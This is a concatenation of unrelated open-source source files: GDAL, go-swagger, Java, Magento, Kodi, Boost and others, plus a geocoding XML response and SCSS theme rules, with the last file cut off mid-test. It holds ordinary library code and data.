#include "gdal_alg_priv.h"
#include "gdal_priv.h"

CPL_CVSID("$Id$")

/************************************************************************/
/*                     GDALTransformGeolocations()                      */
/************************************************************************/

/**
 * Transform locations held in bands.
 *
 * The X/Y and possibly Z values in the identified bands are transformed
 * using a spatial transformer.  The changes values are written back to the
 * source bands so they need to updatable.
 *
 * The bands are processed in place, one row at a time; a failed row-level
 * I/O operation aborts the loop and the error is returned to the caller.
 *
 * @param hXBand the band containing the X locations (usually long/easting).
 * @param hYBand the band containing the Y locations (usually lat/northing).
 * @param hZBand the band containing the Z locations (may be NULL).
 * @param pfnTransformer the transformer function.
 * @param pTransformArg the callback data for the transformer function.
 * @param pfnProgress callback for reporting algorithm progress matching the
 * GDALProgressFunc() semantics.  May be NULL.
 * @param pProgressArg callback argument passed to pfnProgress.
 * @param papszOptions list of name/value options - none currently supported.
 *
 * @return CE_None on success or CE_Failure if an error occurs.
 */
CPLErr
GDALTransformGeolocations( GDALRasterBandH hXBand,
                           GDALRasterBandH hYBand,
                           GDALRasterBandH hZBand,
                           GDALTransformerFunc pfnTransformer,
                           void *pTransformArg,
                           GDALProgressFunc pfnProgress,
                           void *pProgressArg,
                           CPL_UNUSED char **papszOptions )

{
    VALIDATE_POINTER1( hXBand, "GDALTransformGeolocations", CE_Failure );
    VALIDATE_POINTER1( hYBand, "GDALTransformGeolocations", CE_Failure );

    if( pfnProgress == nullptr )
        pfnProgress = GDALDummyProgress;

/* -------------------------------------------------------------------- */
/*      Ensure the bands are matching in size.                          */
/* -------------------------------------------------------------------- */
    GDALRasterBand *poXBand = reinterpret_cast<GDALRasterBand *>(hXBand);
    GDALRasterBand *poYBand = reinterpret_cast<GDALRasterBand *>(hYBand);
    // poZBand may legitimately be null; all Z handling below is conditional.
    GDALRasterBand *poZBand = reinterpret_cast<GDALRasterBand *>(hZBand);
    const int nXSize = poXBand->GetXSize();
    const int nYSize = poXBand->GetYSize();

    if( nXSize != poYBand->GetXSize()
        || nYSize != poYBand->GetYSize()
        || (poZBand != nullptr && nXSize != poZBand->GetXSize())
        || (poZBand != nullptr && nYSize != poZBand->GetYSize()) )
    {
        CPLError( CE_Failure, CPLE_AppDefined,
                  "Size of X, Y and/or Z bands do not match." );
        return CE_Failure;
    }

/* -------------------------------------------------------------------- */
/*      Allocate a buffer large enough to hold one whole row.           */
/* -------------------------------------------------------------------- */
    double *padfX = static_cast<double *>(CPLMalloc(sizeof(double) * nXSize));
    double *padfY = static_cast<double *>(CPLMalloc(sizeof(double) * nXSize));
    double *padfZ = static_cast<double *>(CPLMalloc(sizeof(double) * nXSize));
    int *panSuccess = static_cast<int *>(CPLMalloc(sizeof(int) * nXSize));
    CPLErr eErr = CE_None;

    pfnProgress( 0.0, "", pProgressArg );

    for( int iLine = 0; eErr == CE_None && iLine < nYSize; iLine++ )
    {
        // Read one scanline of X, Y and (if present) Z into the row buffers.
        eErr = poXBand->RasterIO( GF_Read, 0, iLine, nXSize, 1,
                                  padfX, nXSize, 1, GDT_Float64, 0, 0,
                                  nullptr );
        if( eErr == CE_None )
            eErr = poYBand->RasterIO( GF_Read, 0, iLine, nXSize, 1,
                                      padfY, nXSize, 1, GDT_Float64, 0, 0,
                                      nullptr );
        if( eErr == CE_None && poZBand != nullptr )
            eErr = poZBand->RasterIO( GF_Read, 0, iLine, nXSize, 1,
                                      padfZ, nXSize, 1, GDT_Float64, 0, 0,
                                      nullptr );
        else
            // No Z band: present zero elevations to the transformer.
            memset( padfZ, 0, sizeof(double) * nXSize);

        if( eErr == CE_None )
        {
            // Second argument FALSE requests the forward direction of the
            // transformer (bDstToSrc semantics per GDALTransformerFunc).
            // NOTE(review): per-point failures reported via panSuccess are
            // not inspected here; failed points are written back as-is.
            pfnTransformer( pTransformArg, FALSE, nXSize,
                            padfX, padfY, padfZ, panSuccess );
        }

        // Write the transformed coordinates back over the source rows.
        if( eErr == CE_None )
            eErr = poXBand->RasterIO( GF_Write, 0, iLine, nXSize, 1,
                                      padfX, nXSize, 1, GDT_Float64, 0, 0,
                                      nullptr );
        if( eErr == CE_None )
            eErr = poYBand->RasterIO( GF_Write, 0, iLine, nXSize, 1,
                                      padfY, nXSize, 1, GDT_Float64, 0, 0,
                                      nullptr );
        if( eErr == CE_None && poZBand != nullptr )
            eErr = poZBand->RasterIO( GF_Write, 0, iLine, nXSize, 1,
                                      padfZ, nXSize, 1, GDT_Float64, 0, 0,
                                      nullptr );

        if( eErr == CE_None )
            pfnProgress( (iLine+1) / static_cast<double>(nYSize),
                         "", pProgressArg );
    }

/* -------------------------------------------------------------------- */
/*      Cleanup                                                         */
/* -------------------------------------------------------------------- */
    CPLFree( padfX );
    CPLFree( padfY );
    CPLFree( padfZ );
    CPLFree( panSuccess );

    return eErr;
}
{ "pile_set_name": "Github" }
// Copyright 2015 go-swagger maintainers // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package validate import ( "net/http" "github.com/go-openapi/errors" ) // Error messages related to spec validation and returned as results. const ( // ArrayRequiresItemsError ... ArrayRequiresItemsError = "%s for %q is a collection without an element type (array requires items definition)" // ArrayInParamRequiresItemsError ... ArrayInParamRequiresItemsError = "param %q for %q is a collection without an element type (array requires item definition)" // ArrayInHeaderRequiresItemsError ... ArrayInHeaderRequiresItemsError = "header %q for %q is a collection without an element type (array requires items definition)" // BothFormDataAndBodyError indicates that an operation specifies both a body and a formData parameter, which is forbidden BothFormDataAndBodyError = "operation %q has both formData and body parameters. Only one such In: type may be used for a given operation" // CannotResolveRefError when a $ref could not be resolved CannotResolveReferenceError = "could not resolve reference in %s to $ref %s: %v" // CircularAncestryDefinitionError ... 
CircularAncestryDefinitionError = "definition %q has circular ancestry: %v" // DefaultValueDoesNotValidateError results from an invalid default value provided DefaultValueDoesNotValidateError = "default value for %s in %s does not validate its schema" // DefaultValueItemsDoesNotValidateError results from an invalid default value provided for Items DefaultValueItemsDoesNotValidateError = "default value for %s.items in %s does not validate its schema" // DefaultValueHeaderDoesNotValidateError results from an invalid default value provided in header DefaultValueHeaderDoesNotValidateError = "in operation %q, default value in header %s for %s does not validate its schema" // DefaultValueHeaderItemsDoesNotValidateError results from an invalid default value provided in header.items DefaultValueHeaderItemsDoesNotValidateError = "in operation %q, default value in header.items %s for %s does not validate its schema" // DefaultValueInDoesNotValidateError ... DefaultValueInDoesNotValidateError = "in operation %q, default value in %s does not validate its schema" // DuplicateParamNameError ... DuplicateParamNameError = "duplicate parameter name %q for %q in operation %q" // DuplicatePropertiesError ... 
DuplicatePropertiesError = "definition %q contains duplicate properties: %v" // ExampleValueDoesNotValidateError results from an invalid example value provided ExampleValueDoesNotValidateError = "example value for %s in %s does not validate its schema" // ExampleValueItemsDoesNotValidateError results from an invalid example value provided for Items ExampleValueItemsDoesNotValidateError = "example value for %s.items in %s does not validate its schema" // ExampleValueHeaderDoesNotValidateError results from an invalid example value provided in header ExampleValueHeaderDoesNotValidateError = "in operation %q, example value in header %s for %s does not validate its schema" // ExampleValueHeaderItemsDoesNotValidateError results from an invalid example value provided in header.items ExampleValueHeaderItemsDoesNotValidateError = "in operation %q, example value in header.items %s for %s does not validate its schema" // ExampleValueInDoesNotValidateError ... ExampleValueInDoesNotValidateError = "in operation %q, example value in %s does not validate its schema" // EmptyPathParameterError means that a path parameter was found empty (e.g. "{}") EmptyPathParameterError = "%q contains an empty path parameter" // InvalidDocumentError states that spec validation only processes spec.Document objects InvalidDocumentError = "spec validator can only validate spec.Document objects" // InvalidItemsPatternError indicates an Items definition with invalid pattern InvalidItemsPatternError = "%s for %q has invalid items pattern: %q" // InvalidParameterDefinitionError indicates an error detected on a parameter definition InvalidParameterDefinitionError = "invalid definition for parameter %s in %s in operation %q" // InvalidParameterDefinitionAsSchemaError indicates an error detected on a parameter definition, which was mistaken with a schema definition. // Most likely, this situation is encountered whenever a $ref has been added as a sibling of the parameter definition. 
InvalidParameterDefinitionAsSchemaError = "invalid definition as Schema for parameter %s in %s in operation %q" // InvalidPatternError ... InvalidPatternError = "pattern %q is invalid in %s" // InvalidPatternInError indicates an invalid pattern in a schema or items definition InvalidPatternInError = "%s in %s has invalid pattern: %q" // InvalidPatternInHeaderError indicates a header definition with an invalid pattern InvalidPatternInHeaderError = "in operation %q, header %s for %s has invalid pattern %q: %v" // InvalidPatternInParamError ... InvalidPatternInParamError = "operation %q has invalid pattern in param %q: %q" // InvalidReferenceError indicates that a $ref property could not be resolved InvalidReferenceError = "invalid ref %q" // InvalidResponseDefinitionAsSchemaError indicates an error detected on a response definition, which was mistaken with a schema definition. // Most likely, this situation is encountered whenever a $ref has been added as a sibling of the response definition. InvalidResponseDefinitionAsSchemaError = "invalid definition as Schema for response %s in %s" // MultipleBodyParamError indicates that an operation specifies multiple parameter with in: body MultipleBodyParamError = "operation %q has more than 1 body param: %v" // NonUniqueOperationIDError indicates that the same operationId has been specified several times NonUniqueOperationIDError = "%q is defined %d times" // NoParameterInPathError indicates that a path was found without any parameter NoParameterInPathError = "path param %q has no parameter definition" // NoValidPathErrorOrWarning indicates that no single path could be validated. If Paths is empty, this message is only a warning. NoValidPathErrorOrWarning = "spec has no valid path defined" // NoValidResponseError indicates that no valid response description could be found for an operation NoValidResponseError = "operation %q has no valid response" // PathOverlapError ... 
PathOverlapError = "path %s overlaps with %s" // PathParamNotInPathError indicates that a parameter specified with in: path was not found in the path specification PathParamNotInPathError = "path param %q is not present in path %q" // PathParamNotUniqueError ... PathParamNotUniqueError = "params in path %q must be unique: %q conflicts with %q" // PathParamNotRequiredError ... PathParamRequiredError = "in operation %q,path param %q must be declared as required" // RefNotAllowedInHeaderError indicates a $ref was found in a header definition, which is not allowed by Swagger RefNotAllowedInHeaderError = "IMPORTANT!in %q: $ref are not allowed in headers. In context for header %q%s" // RequiredButNotDefinedError ... RequiredButNotDefinedError = "%q is present in required but not defined as property in definition %q" // SomeParametersBrokenError indicates that some parameters could not be resolved, which might result in partial checks to be carried on SomeParametersBrokenError = "some parameters definitions are broken in %q.%s. Cannot carry on full checks on parameters for operation %s" // UnresolvedReferencesError indicates that at least one $ref could not be resolved UnresolvedReferencesError = "some references could not be resolved in spec. First found: %v" ) // Warning messages related to spec validation and returned as results const ( // ExamplesWithoutSchemaWarning indicates that examples are provided for a response,but not schema to validate the example against ExamplesWithoutSchemaWarning = "Examples provided without schema in operation %q, %s" // ExamplesMimeNotSupportedWarning indicates that examples are provided with a mime type different than application/json, which // the validator dos not support yetl ExamplesMimeNotSupportedWarning = "No validation attempt for examples for media types other than application/json, in operation %q, %s" // PathParamGarbledWarning ... PathParamGarbledWarning = "in path %q, param %q contains {,} or white space. 
Albeit not stricly illegal, this is probably no what you want" // PathStrippedParamGarbledWarning ... PathStrippedParamGarbledWarning = "path stripped from path parameters %s contains {,} or white space. This is probably no what you want." // ReadOnlyAndRequiredWarning ... ReadOnlyAndRequiredWarning = "Required property %s in %q should not be marked as both required and readOnly" // RefShouldNotHaveSiblingsWarning indicates that a $ref was found with a sibling definition. This results in the $ref taking over its siblings, // which is most likely not wanted. RefShouldNotHaveSiblingsWarning = "$ref property should have no sibling in %q.%s" // RequiredHasDefaultWarning indicates that a required parameter property should not have a default RequiredHasDefaultWarning = "%s in %s has a default value and is required as parameter" // UnusedDefinitionWarning ... UnusedDefinitionWarning = "definition %q is not used anywhere" // UnusedParamWarning ... UnusedParamWarning = "parameter %q is not used anywhere" // UnusedResponseWarning ... UnusedResponseWarning = "response %q is not used anywhere" ) // Additional error codes const ( // InternalErrorCode reports an internal technical error InternalErrorCode = http.StatusInternalServerError // NotFoundErrorCode indicates that a resource (e.g. 
a $ref) could not be found NotFoundErrorCode = http.StatusNotFound ) func invalidDocumentMsg() errors.Error { return errors.New(InternalErrorCode, InvalidDocumentError) } func invalidRefMsg(path string) errors.Error { return errors.New(NotFoundErrorCode, InvalidReferenceError, path) } func unresolvedReferencesMsg(err error) errors.Error { return errors.New(errors.CompositeErrorCode, UnresolvedReferencesError, err) } func noValidPathMsg() errors.Error { return errors.New(errors.CompositeErrorCode, NoValidPathErrorOrWarning) } func emptyPathParameterMsg(path string) errors.Error { return errors.New(errors.CompositeErrorCode, EmptyPathParameterError, path) } func nonUniqueOperationIDMsg(path string, i int) errors.Error { return errors.New(errors.CompositeErrorCode, NonUniqueOperationIDError, path, i) } func circularAncestryDefinitionMsg(path string, args interface{}) errors.Error { return errors.New(errors.CompositeErrorCode, CircularAncestryDefinitionError, path, args) } func duplicatePropertiesMsg(path string, args interface{}) errors.Error { return errors.New(errors.CompositeErrorCode, DuplicatePropertiesError, path, args) } func pathParamNotInPathMsg(path, param string) errors.Error { return errors.New(errors.CompositeErrorCode, PathParamNotInPathError, param, path) } func arrayRequiresItemsMsg(path, operation string) errors.Error { return errors.New(errors.CompositeErrorCode, ArrayRequiresItemsError, path, operation) } func arrayInParamRequiresItemsMsg(path, operation string) errors.Error { return errors.New(errors.CompositeErrorCode, ArrayInParamRequiresItemsError, path, operation) } func arrayInHeaderRequiresItemsMsg(path, operation string) errors.Error { return errors.New(errors.CompositeErrorCode, ArrayInHeaderRequiresItemsError, path, operation) } func invalidItemsPatternMsg(path, operation, pattern string) errors.Error { return errors.New(errors.CompositeErrorCode, InvalidItemsPatternError, path, operation, pattern) } func invalidPatternMsg(pattern, path 
string) errors.Error { return errors.New(errors.CompositeErrorCode, InvalidPatternError, pattern, path) } func requiredButNotDefinedMsg(path, definition string) errors.Error { return errors.New(errors.CompositeErrorCode, RequiredButNotDefinedError, path, definition) } func pathParamGarbledMsg(path, param string) errors.Error { return errors.New(errors.CompositeErrorCode, PathParamGarbledWarning, path, param) } func pathStrippedParamGarbledMsg(path string) errors.Error { return errors.New(errors.CompositeErrorCode, PathStrippedParamGarbledWarning, path) } func pathOverlapMsg(path, arg string) errors.Error { return errors.New(errors.CompositeErrorCode, PathOverlapError, path, arg) } func invalidPatternInParamMsg(operation, param, pattern string) errors.Error { return errors.New(errors.CompositeErrorCode, InvalidPatternInParamError, operation, param, pattern) } func pathParamRequiredMsg(operation, param string) errors.Error { return errors.New(errors.CompositeErrorCode, PathParamRequiredError, operation, param) } func bothFormDataAndBodyMsg(operation string) errors.Error { return errors.New(errors.CompositeErrorCode, BothFormDataAndBodyError, operation) } func multipleBodyParamMsg(operation string, args interface{}) errors.Error { return errors.New(errors.CompositeErrorCode, MultipleBodyParamError, operation, args) } func pathParamNotUniqueMsg(path, param, arg string) errors.Error { return errors.New(errors.CompositeErrorCode, PathParamNotUniqueError, path, param, arg) } func duplicateParamNameMsg(path, param, operation string) errors.Error { return errors.New(errors.CompositeErrorCode, DuplicateParamNameError, param, path, operation) } func unusedParamMsg(arg string) errors.Error { return errors.New(errors.CompositeErrorCode, UnusedParamWarning, arg) } func unusedDefinitionMsg(arg string) errors.Error { return errors.New(errors.CompositeErrorCode, UnusedDefinitionWarning, arg) } func unusedResponseMsg(arg string) errors.Error { return 
errors.New(errors.CompositeErrorCode, UnusedResponseWarning, arg) } func readOnlyAndRequiredMsg(path, param string) errors.Error { return errors.New(errors.CompositeErrorCode, ReadOnlyAndRequiredWarning, param, path) } func noParameterInPathMsg(param string) errors.Error { return errors.New(errors.CompositeErrorCode, NoParameterInPathError, param) } func requiredHasDefaultMsg(param, path string) errors.Error { return errors.New(errors.CompositeErrorCode, RequiredHasDefaultWarning, param, path) } func defaultValueDoesNotValidateMsg(param, path string) errors.Error { return errors.New(errors.CompositeErrorCode, DefaultValueDoesNotValidateError, param, path) } func defaultValueItemsDoesNotValidateMsg(param, path string) errors.Error { return errors.New(errors.CompositeErrorCode, DefaultValueItemsDoesNotValidateError, param, path) } func noValidResponseMsg(operation string) errors.Error { return errors.New(errors.CompositeErrorCode, NoValidResponseError, operation) } func defaultValueHeaderDoesNotValidateMsg(operation, header, path string) errors.Error { return errors.New(errors.CompositeErrorCode, DefaultValueHeaderDoesNotValidateError, operation, header, path) } func defaultValueHeaderItemsDoesNotValidateMsg(operation, header, path string) errors.Error { return errors.New(errors.CompositeErrorCode, DefaultValueHeaderItemsDoesNotValidateError, operation, header, path) } func invalidPatternInHeaderMsg(operation, header, path, pattern string, args interface{}) errors.Error { return errors.New(errors.CompositeErrorCode, InvalidPatternInHeaderError, operation, header, path, pattern, args) } func invalidPatternInMsg(path, in, pattern string) errors.Error { return errors.New(errors.CompositeErrorCode, InvalidPatternInError, path, in, pattern) } func defaultValueInDoesNotValidateMsg(operation, path string) errors.Error { return errors.New(errors.CompositeErrorCode, DefaultValueInDoesNotValidateError, operation, path) } func exampleValueDoesNotValidateMsg(param, path string) 
errors.Error { return errors.New(errors.CompositeErrorCode, ExampleValueDoesNotValidateError, param, path) } func exampleValueItemsDoesNotValidateMsg(param, path string) errors.Error { return errors.New(errors.CompositeErrorCode, ExampleValueItemsDoesNotValidateError, param, path) } func exampleValueHeaderDoesNotValidateMsg(operation, header, path string) errors.Error { return errors.New(errors.CompositeErrorCode, ExampleValueHeaderDoesNotValidateError, operation, header, path) } func exampleValueHeaderItemsDoesNotValidateMsg(operation, header, path string) errors.Error { return errors.New(errors.CompositeErrorCode, ExampleValueHeaderItemsDoesNotValidateError, operation, header, path) } func exampleValueInDoesNotValidateMsg(operation, path string) errors.Error { return errors.New(errors.CompositeErrorCode, ExampleValueInDoesNotValidateError, operation, path) } func examplesWithoutSchemaMsg(operation, response string) errors.Error { return errors.New(errors.CompositeErrorCode, ExamplesWithoutSchemaWarning, operation, response) } func examplesMimeNotSupportedMsg(operation, response string) errors.Error { return errors.New(errors.CompositeErrorCode, ExamplesMimeNotSupportedWarning, operation, response) } func refNotAllowedInHeaderMsg(path, header, ref string) errors.Error { return errors.New(errors.CompositeErrorCode, RefNotAllowedInHeaderError, path, header, ref) } func cannotResolveRefMsg(path, ref string, err error) errors.Error { return errors.New(errors.CompositeErrorCode, CannotResolveReferenceError, path, ref, err) } func invalidParameterDefinitionMsg(path, method, operationID string) errors.Error { return errors.New(errors.CompositeErrorCode, InvalidParameterDefinitionError, path, method, operationID) } func invalidParameterDefinitionAsSchemaMsg(path, method, operationID string) errors.Error { return errors.New(errors.CompositeErrorCode, InvalidParameterDefinitionAsSchemaError, path, method, operationID) } // disabled //func 
invalidResponseDefinitionAsSchemaMsg(path, method string) errors.Error { // return errors.New(errors.CompositeErrorCode, InvalidResponseDefinitionAsSchemaError, path, method) //} func someParametersBrokenMsg(path, method, operationID string) errors.Error { return errors.New(errors.CompositeErrorCode, SomeParametersBrokenError, path, method, operationID) } func refShouldNotHaveSiblingsMsg(path, operationID string) errors.Error { return errors.New(errors.CompositeErrorCode, RefShouldNotHaveSiblingsWarning, operationID, path) }
{ "pile_set_name": "Github" }
package com.stuffwithstuff.bantam; public enum TokenType { LEFT_PAREN, RIGHT_PAREN, COMMA, ASSIGN, PLUS, MINUS, ASTERISK, SLASH, CARET, TILDE, BANG, QUESTION, COLON, NAME, EOF; /** * If the TokenType represents a punctuator (i.e. a token that can split an * identifier like '+', this will get its text. */ public Character punctuator() { switch (this) { case LEFT_PAREN: return '('; case RIGHT_PAREN: return ')'; case COMMA: return ','; case ASSIGN: return '='; case PLUS: return '+'; case MINUS: return '-'; case ASTERISK: return '*'; case SLASH: return '/'; case CARET: return '^'; case TILDE: return '~'; case BANG: return '!'; case QUESTION: return '?'; case COLON: return ':'; default: return null; } } }
{ "pile_set_name": "Github" }
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html > <head><title></title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="generator" content="TeX4ht (http://www.tug.org/tex4ht/)"> <meta name="originator" content="TeX4ht (http://www.tug.org/tex4ht/)"> <!-- html --> <meta name="src" content="bigdata.tex"> <meta name="date" content="2016-05-10 11:14:00"> <link rel="stylesheet" type="text/css" href="bigdata.css"> </head><body > <div class="footnote-text"> <!--l. 1008--><p class="indent" > <span class="footnote-mark"><a id="fn5x7"> <sup class="textsuperscript">5</sup></a></span><span class="cmr-10">Earlier versions used the MapFile</span><a id="dx15-58006"></a> <span class="cmr-10">format. The MapFile is actually</span> <span class="cmr-10">a directory that contains two SequenceFile: the data file and the index file.</span> </div> </body></html>
{ "pile_set_name": "Github" }
// Copyright (c) Microsoft Open Technologies, Inc. All rights reserved. See License.txt in the project root for license information. namespace System.Data.Entity.TestModels.ExtraLazyLoading { public interface IHasIsLoaded { bool IsLoaded { get; set; } } }
{ "pile_set_name": "Github" }
<?php /** * Magento * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * http://opensource.org/licenses/osl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to [email protected] so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade Magento to newer * versions in the future. If you wish to customize Magento for your * needs please refer to http://www.magento.com for more information. * * @category Mage * @package Mage_Usa * @copyright Copyright (c) 2006-2020 Magento, Inc. (http://www.magento.com) * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0) */ class Mage_Usa_Model_Shipping_Carrier_Dhl_Source_Freemethod extends Mage_Usa_Model_Shipping_Carrier_Dhl_Source_Method { public function toOptionArray() { $arr = parent::toOptionArray(); array_unshift($arr, array('value'=>'', 'label'=>Mage::helper('shipping')->__('None'))); return $arr; } }
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <string xmlns="http://tempuri.org/">{ "Info": [ { "IsSuccess": "True", "InAddress": "臺南市永康區中華一路70號", "InSRS": "EPSG:4326", "InFuzzyType": "[單雙號機制]+[最近門牌號機制]", "InFuzzyBuffer": "0", "InIsOnlyFullMatch": "False", "InIsLockCounty": "True", "InIsLockTown": "False", "InIsLockVillage": "False", "InIsLockRoadSection": "False", "InIsLockLane": "False", "InIsLockAlley": "False", "InIsLockArea": "False", "InIsSameNumber_SubNumber": "True", "InCanIgnoreVillage": "True", "InCanIgnoreNeighborhood": "True", "InReturnMaxCount": "0", "OutTotal": "1", "OutMatchType": "完全比對", "OutMatchCode": "[臺南市]\tFULL:1", "OutTraceInfo": "[臺南市]\t { 完全比對 } 找到符合的門牌地址" } ], "AddressList": [ { "FULL_ADDR": "臺南市永康區中興里16鄰中華一路70號", "COUNTY": "臺南市", "TOWN": "永康區", "VILLAGE": "中興里", "NEIGHBORHOOD": "16鄰", "ROAD": "中華一路", "SECTION": "", "LANE": "", "ALLEY": "", "SUB_ALLEY": "", "TONG": "", "NUMBER": "70號", "X": 120.237409, "Y": 23.004478 } ] }</string>
{ "pile_set_name": "Github" }
/* * Copyright (C) 2005-2013 Team XBMC * http://www.xbmc.org * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. * */ #include <ctime> #include <clocale> #include <cstring> #include <cstdio> #include "DateTime.h" namespace MPTV { void CDateTime::InitLocale(void) { // Follow system default for date and time formatting // because we cannot access XBMC's locale settings from the PVR addon setlocale(LC_ALL, ""); } CDateTime::CDateTime() { InitLocale(); memset(&m_time, 0, sizeof(m_time)); } CDateTime::CDateTime(const time_t& dateTime) { InitLocale(); SetFromTime(dateTime); } CDateTime::CDateTime(const struct tm& dateTime) { InitLocale(); m_time = dateTime; } CDateTime::~CDateTime() {} int CDateTime::GetDay() const { return m_time.tm_mday; } int CDateTime::GetMonth() const { return (m_time.tm_mon + 1); } int CDateTime::GetYear() const { return (m_time.tm_year + 1900); } int CDateTime::GetHour() const { return (m_time.tm_hour); } int CDateTime::GetMinute() const { return (m_time.tm_min); } int CDateTime::GetSecond() const { return (m_time.tm_sec); } int CDateTime::GetDayOfWeek() const { return (m_time.tm_wday); } time_t CDateTime::GetAsTime() const { time_t retval; struct tm tm_time = m_time; retval = mktime (&tm_time); if(retval < 0) retval = 0; return retval; } bool CDateTime::SetFromDateTime(const std::string& dateTime) { int year, month ,day; int hour, minute, second; int count; count = 
sscanf(dateTime.c_str(), "%4d-%2d-%2d %2d:%2d:%2d", &year, &month, &day, &hour, &minute, &second); if(count != 6) return false; m_time.tm_hour = hour; m_time.tm_min = minute; m_time.tm_sec = second; m_time.tm_year = year - 1900; m_time.tm_mon = month - 1; m_time.tm_mday = day; // Make the other fields empty: m_time.tm_isdst = -1; m_time.tm_wday = 0; m_time.tm_yday = 0; return true; } void CDateTime::SetFromTime(const time_t& time) { m_time = *localtime( &time ); } void CDateTime::SetFromTM(const struct tm& time) { m_time = time; } void CDateTime::GetAsLocalizedDate(std::string & strDate) const { const unsigned int bufSize = 64; char buffer[bufSize]; strftime(buffer, bufSize, "%x", &m_time); strDate = buffer; } void CDateTime::GetAsLocalizedTime(std::string & strTime) const { const unsigned int bufSize = 64; char buffer[bufSize]; strftime(buffer, bufSize, "%H:%M", &m_time); strTime = buffer; } int CDateTime::operator -(const CDateTime& right) const { time_t leftTime = GetAsTime(); time_t rightTime = right.GetAsTime(); return (int) (leftTime-rightTime); } const CDateTime& CDateTime::operator =(const time_t& right) { SetFromTime(right); return *this; } const CDateTime& CDateTime::operator =(const tm& right) { m_time = right; return *this; } bool CDateTime::operator ==(const time_t& right) const { time_t left = GetAsTime(); return (left == right); } const CDateTime& CDateTime::operator +=(const int seconds) { time_t left = GetAsTime(); left += seconds; SetFromTime(left); return *this; } time_t CDateTime::Now() { time_t now; time(&now); return now; } } // namespace MPTV
{ "pile_set_name": "Github" }
.p-file_list { background: $bg2; } .p-file_viewer__empty { color: $disabled; } .p-file_viewer__nav { background: $bg; } .c-file_container { background: $bg; } .c-file__title { color: $fg; } .c-file__meta { color: $text; } .c-file__slide--meta { background: $bg; } .c-file__icon { &:after { color: $bg; border: 3px solid $bg; } } .c-file__thumb { border: 1px solid $borderLight; } .c-file__media--video { background: $bg; } .c-file__actions--overflow { background: $active; } .c-file__action_button { background-color: $button; color: $fg; &:link, &:visited { color: $accent2; } &:active, &:focus, &:hover { background: $selectBg; color: $primary; } &:active { background: $active; } } .c-file__action_button--dark { background-color: $button; color: $fg; &:active, &:hover { background-color: $active; color: $selectFg; } &:after { border-color: $button; } } .c-file__highlight { background-color: $hl; } .c-pillow_file_container { background: $bg; border: 1px solid $border; &.c-pillow_file_container--focus-within, &:hover { border-color: $borderLight; } } .c-pillow_file_container--full_width { border-color: $borderLight; &.c-pillow_file_container--focus-within, &:hover { background: $tree; } } .c-pillow_file_container--active_download { background-color: $accent2; .c-pillow_file__description, .c-pillow_file__title { color: $primary; } } .c-pillow_file_container--download .c-pillow_file__slide { background: $bg; } .c-pillow_file--active_download .c-pillow_file__slide { background: $accent2; } .c-pillow_file__header { &:link { &:focus, &:hover { color: $primary; } } color: $fg; } .c-pillow_file__header--hidden, .c-pillow_file__header--tombstone { color: $disabled; } .c-pillow_file__swap { .c-pillow_file__slide { background: $bg; } } .c-pillow_file__icon--slide:after { border: 3px solid $borderLight; color: $fg; } .c-pillow_file__icon--hidden, .c-pillow_file__icon--not_found, .c-pillow_file__icon--tombstone { background: $excluded; } .c-pillow_file__description { color: $text; } 
.c-pillow_file__title { color: $fg; } .c-pillow_file__preview { border: 1px solid $borderLight; } .c-pillow_file__video { background: $bg; } .c-pillow_file__video:focus, .c-pillow_file__video_container:focus { box-shadow: 0 0 0 1px $primary, 0 0 0 5px $primaryT; } .c-pillow_file__content--collapsed { &:after { background: linear-gradient(0deg, $bg, hsla(0, 0%, 100%, 0) 40px) } } .c-pillow_file__expandable_pill__button { background: $accent; color: $selectFg; } .p-file_viewer__header__meta__name { color: $text; } .p-file_viewer__header__edit_btn { color: $fg; } .p-file_viewer__header__separator { background: $border; } .p-file_viewer__header__button:hover { color: $primary; } .p-file_image_thumbnail__wrapper { background-color: $bg2; &:after { border: 1px solid rgba(0, 0, 0, 0.1); } } .p-new_file_menu__gdoc_icon { color: $blue; } .p-new_file_menu__gsheet_icon { color: $green; } .p-new_file_menu__gpres_icon { color: $yellow; }
{ "pile_set_name": "Github" }
//Copyright (c) 2006-2009 Emil Dotchevski and Reverge Studios, Inc. //Distributed under the Boost Software License, Version 1.0. (See accompanying //file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) #include <boost/exception_ptr.hpp> #include <boost/exception/get_error_info.hpp> #include <boost/exception/info.hpp> #include <boost/detail/lightweight_test.hpp> #include <boost/detail/workaround.hpp> #if BOOST_WORKAROUND(__CODEGEARC__, BOOST_TESTED_AT(0x610)) struct tag_test {}; #endif typedef boost::error_info<struct tag_test,int> test; struct test_boost_exception: boost::exception { }; void throw_boost_exception() { throw test_boost_exception() << test(42); } void throw_unknown_exception() { struct test_exception: std::exception { }; throw test_exception(); } int main() { try { throw_boost_exception(); } catch( ... ) { boost::exception_ptr ep=boost::current_exception(); try { rethrow_exception(ep); } catch( boost::unknown_exception & x ) { if( int const * d=boost::get_error_info<test>(x) ) BOOST_TEST( 42==*d ); else BOOST_TEST(false); } catch( boost::exception & x ) { //Yay! Non-intrusive cloning supported! if( int const * d=boost::get_error_info<test>(x) ) BOOST_TEST( 42==*d ); else BOOST_TEST(false); } catch( ... ) { BOOST_TEST(false); } try { rethrow_exception(ep); } 